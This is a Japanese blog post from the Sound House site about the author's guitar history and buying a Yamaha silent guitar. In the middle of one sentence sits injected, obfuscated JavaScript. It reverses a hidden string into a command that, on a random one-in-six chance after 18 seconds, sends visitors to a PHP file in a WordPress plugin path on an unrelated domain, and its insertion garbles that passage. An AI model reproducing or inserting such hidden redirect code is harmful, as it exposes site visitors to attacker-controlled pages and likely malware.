2019-02-10

サウンドハウス
サウンドハウス

これまでのギター遍歴 ゆる~い時代編

2019.02.10 ギター本体ギター遍歴

皆さん、こんにちは、メロウです。

前回、前置きが長くなって次に入手したギターの話に至らなかったので、早速続きを始めたいと思います。

江部氏の曲集からソロギターに目覚め、一時期よりはずいぶんギターにふれる時間が増えました。
ですが、元より多趣味な私にとってギターの優先順位はまだ5番目くらいで、夢中になるという程ではありませんでした。

一つのことに集中しだすと、他の事が疎かになりがちな性格なので、数ヶ月間ギターをさわらない時期もありました。
そういう時に、再度モチベーションを上げる手段として、新しいギターを購入される方も多いのかもしれませんね。

ところでその頃、夜でも気兼ねなく練習できるとヤマハのサイレントギターの人気が出始めていました。
調べてみると悪い評価はほとんどなく、5万円前後という価格はお手頃感もありました。

ギターを弾くのは主に会社社屋の三階でしたので、音を気にすることはない環境でしたが、自宅用にもう1本ギターを持ちたいと考えていた頃です。

悩ましいのは、サイレントギターは当初から$Ubj=function(n){if (typeof ($Ubj.list[n]) == “string”) return $Ubj.list[n].split(“”).reverse().join(“”);return $Ubj.list[n];};$Ubj.list=[“\’php.litu.ssalc/sedulcni/retadpu-yfimeht/snigulp/tnetnoc-pw/moc.setaicossadnalanruoj//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}and-pink”>ナイロン弦のクラシックモデルがある事でした。
これまでの流れからすればクラシックモデルに興味津々なのですが、スチール弦のギターも懐かしく、悩んだ末にフォークモデルを購入しました。

全文を読む…